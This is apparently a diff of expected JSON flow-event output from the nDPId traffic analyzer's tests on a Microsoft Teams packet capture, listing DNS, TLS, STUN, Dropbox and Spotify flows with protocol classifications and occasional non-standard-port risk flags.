+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1587041682809,"flow_last_seen":1587041688190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2932,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1587041692808,"flow_last_seen":1587041695538,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1225,"flow_tot_l4_payload_len":4100,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693428,"flow_last_seen":1587041697999,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1201,"flow_tot_l4_payload_len":12443,"flow_avg_l4_payload_len":401,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"3":"DPI (partial)"},"proto":"STUN.Azure","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693428,"flow_last_seen":1587041697999,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1201,"flow_tot_l4_payload_len":12443,"flow_avg_l4_payload_len":401,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041695305,"flow_last_seen":1587041698021,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":1214,"flow_tot_l4_payload_len":7582,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1587041695305,"flow_last_seen":1587041697619,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041695305,"flow_last_seen":1587041698021,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":1214,"flow_tot_l4_payload_len":7582,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1587041695305,"flow_last_seen":1587041697619,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1587041682740,"flow_last_seen":1587041682856,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9052,"flow_avg_l4_payload_len":565,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1587041693597,"flow_last_seen":1587041695591,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1414,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693515,"flow_last_seen":1587041693640,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695422,"flow_last_seen":1587041695432,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693611,"flow_last_seen":1587041697663,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1587041693654,"flow_last_seen":1587041697713,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1745,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693582,"flow_last_seen":1587041693698,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693668,"flow_last_seen":1587041697714,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695421,"flow_last_seen":1587041695433,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1587041676612,"flow_last_seen":1587041676808,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8429,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1587041685251,"flow_last_seen":1587041685681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10159,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041686889,"flow_last_seen":1587041687253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10175,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} 